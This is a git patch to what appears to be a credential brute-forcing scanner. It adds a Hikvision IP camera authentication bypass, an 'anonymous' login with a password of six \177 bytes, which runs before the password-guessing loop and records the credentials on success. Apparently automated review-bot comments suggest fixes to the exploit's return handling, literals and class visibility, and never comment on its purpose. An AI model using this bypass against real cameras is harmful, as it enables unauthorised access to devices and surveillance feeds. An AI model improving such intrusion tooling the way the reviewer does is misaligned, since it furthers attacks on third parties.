From 5789c1d4db08d2abd84204ff9d523ac06223d35d Mon Sep 17 00:00:00 2001
From: cora32
Date: Sun, 19 Apr 2015 03:02:30 +0300
Subject: [PATCH] Hikvision exploit applied (http://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities)
---
 BasicAuth.cpp | 22 ++++++++++++++++++++++
 BasicAuth.h | 2 +-
 2 files changed, 23 insertions(+), 1 deletion(-)
diff --git a/BasicAuth.cpp b/BasicAuth.cpp
index 6961dd6..93d4137 100644
--- a/BasicAuth.cpp
+++ b/BasicAuth.cpp
@@ -30,6 +30,19 @@ bool BA::checkOutput(const string *buffer, const char *ip, const int port) {
 return false;
 }
+//http://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities 2
+inline bool commenceHikvisionEx1(const char *ip, const int port, bool digestMode) {
+ std::string lpString = string("anonymous") + ":" + string("\177\177\177\177\177\177");
+
+ string buffer;
+ int res = Connector::nConnect(ip, port, &buffer, NULL, NULL, &lpString, digestMode);
+ if (res == -2) return -1;
+ else if (res != -1) {
+ if (BA::checkOutput(&buffer, ip, port)) return 1;
+ }
+ return 0;
+}
+
 lopaStr BA::BABrute(const char *ip, const int port, bool digestMode) {
 string buffer;
 string lpString;
@@ -37,6 +50,15 @@ lopaStr BA::BABrute(const char *ip, const int port, bool digestMode) {
 int passCounter = 0;
 int res = 0;
+ if (commenceHikvisionEx1(ip, port, digestMode)) {
+ stt->doEmitionGreenFoundData("Hikvision exploit triggered! (" +
+ QString(ip) + ":" +
+ QString::number(port) + ")");
+ strcpy(lps.login, "anonymous");
+ strcpy(lps.pass, "\177\177\177\177\177\177");
+ return lps;
+ }
+
 for(int i = 0; i < MaxLogin; ++i) {
 for (int j = 0; j < MaxPass; ++j) {
 FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready;});
diff --git a/BasicAuth.h b/BasicAuth.h
index eef6441..9ef3f68 100644
--- a/BasicAuth.h
+++ b/BasicAuth.h
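Review bot: `commenceHikvisionEx1` is declared `bool` but returns `-1` when `res == -2`, and `-1` converts to `true`, so that path cannot be told apart from the `return 1` success path. The caller added in the next hunk, `if (commenceHikvisionEx1(ip, port, digestMode))`, will then emit the "triggered" message and record the hard-coded login for a host where `BA::checkOutput` was never consulted. What `-2` means is defined in `Connector::nConnect`, outside this diff, but the code treats it as a distinct non-success result. Either write `if (res == -2) return false;`, or change the return type to `int` and test `== 1` at the call site.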
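Review bot: The login and password literals in the two `strcpy` calls duplicate the ones used to build `lpString` in `commenceHikvisionEx1`, so the value that was tested and the value recorded in `lps` can drift apart on a later edit. Define them once at file scope, e.g. `static const char kHikLogin[] = "anonymous";` with a matching `kHikPass`, and use those names in both places. The `strcpy` calls also depend on the sizes of `lps.login` and `lps.pass`, which are declared outside this diff; a comment stating the size assumption, or a bounded copy, would make that explicit. `BABrute`'s body continues outside the hunk.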
@@ -8,10 +8,10 @@ class BA {
 private:
- static bool checkOutput(const string *buffer, const char *ip, const int port);
 static lopaStr BABrute(const char *ip, const int port, bool digestMode);
 public:
+ static bool checkOutput(const string *buffer, const char *ip, const int port);
 static lopaStr BALobby(const char *ip, const int port, bool digestMode);
 };
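Review bot: Moving `checkOutput` under `public:` widens `BA`'s interface only so that the new file-local helper in BasicAuth.cpp can call it. Declaring the helper as a private static member instead, `static bool commenceHikvisionEx1(const char *ip, const int port, bool digestMode);`, would let `checkOutput` stay private and leave `BALobby` as the only public entry point. If the wider visibility is intended, a one-line comment above the declaration naming the other callers would document why.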